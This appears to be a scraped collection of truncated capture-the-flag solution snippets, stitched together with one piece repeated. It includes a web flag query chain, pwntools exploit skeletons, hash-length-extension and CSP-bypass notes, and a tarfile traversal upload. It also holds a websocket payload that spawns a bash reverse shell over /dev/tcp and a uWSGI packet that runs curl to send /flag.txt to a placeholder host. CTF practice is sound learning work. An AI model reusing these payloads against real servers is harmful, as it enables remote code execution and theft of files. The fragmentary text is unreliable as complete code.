Chaining this, then you can get flag.
Query1: input=FLAG_[YOUR_SESSIONID]&converter=__defineSetter__
Query2: input=FLAG_[YOUR_SESSIONID]&converter=__lookupSetter__
FLAG: TSGCTF{Goo00o0o000o000ood_job!_you_are_rEADy_7o_do_m0re_Web}
from pwn import * | |
r = process('./note') | |
#r = remote('problem.harekaze.com',20003) | |
#context.log_level = 'debug' | |
e = ELF('./note') | |
l = e.libc | |
s = lambda x:r.send(str(x)) | |
sl = lambda x:r.sendline(str(x)) |
import requests | |
import urllib | |
import json | |
url = lambda x:"http://mashiro.kr:13000/search?limit=%s"%urllib.quote(x) | |
cnt = 0 | |
pw = '' | |
for i in range(1,33): | |
tmp = 0 |
''' | |
1. hash length extension: Make multi query. | |
2. header injection: Remove CSP header, and XSS occur | |
''' | |
import hashpumpy | |
import requests | |
b64e = lambda x:x.encode('base64').replace('\n','') |
from pwn import * | |
#r = process('./plane_market') | |
r = remote('tasks.aeroctf.com', 33087) | |
c0 = lambda:r.recvuntil(':') | |
c1 = lambda:r.recvuntil('>') | |
s = lambda x:r.send(str(x)) | |
sl = lambda x:r.sendline(str(x)) |
#!/usr/bin/python | |
import requests | |
import os | |
import threading | |
import yaml | |
import subprocess | |
''' | |
Vulnerabilities: | |
1. Directory Traversal + File upload: User can upload to the parent folder because of tarfile.tar's extractall. |
Chaining this, then you can get flag.
Query1: input=FLAG_[YOUR_SESSIONID]&converter=__defineSetter__
Query2: input=FLAG_[YOUR_SESSIONID]&converter=__lookupSetter__
FLAG: TSGCTF{Goo00o0o000o000ood_job!_you_are_rEADy_7o_do_m0re_Web}
var __classPrivateFieldSet = function(receiver, privateMap, value) { | |
if (!privateMap.has(receiver)) { | |
throw new TypeError( | |
"attempted to set private field on non-instance" | |
); | |
} | |
privateMap.set(receiver, value); | |
console.log(privateMap.get(flag)); | |
return value; | |
}; |
import websockets | |
import asyncio | |
import json | |
import socket | |
host = "ws://harmony-1.hackable.software:3380/chat" | |
payload = '{"script-sample":{"toString":{"___js-to-json-class___":"Function","json":"console.log(global.process.mainModule.require(`child_process`).execSync(`bash -c \'bash -i >& /dev/tcp/<host>/<port> 0>&1\'`))"}},"document-uri":"a","referrer":"b","violated-directive":"c","effective-directive":"d","original-policy":"e","disposition":"f","blocked-uri":"g","line-number":1,"source-file":"1","status-code":"a"}}' | |
def register(username): |
import requests | |
url = "http://simplenote.chal.perfect.blue/" | |
data = '\x00\xdc\x00\x00\x0f\x00SERVER_PROTOCOL\x08\x00HTTP/1.1\x0e\x00REQUEST_METHOD\x03\x00GET\t\x00PATH_INFO\x01\x00/\x0b\x00REQUEST_URI\x01\x00/\x0c\x00QUERY_STRING\x00\x00\x0b\x00SERVER_NAME\x00\x00\t\x00HTTP_HOST\x08\x00app:4444\n\x00UWSGI_FILE<\x00exec://curl http://[YOUR_URL]:10101 --data "`cat /flag.txt`"\x0b\x00SCRIPT_NAME\x01\x00a' | |
r = requests.post(url, data = data) |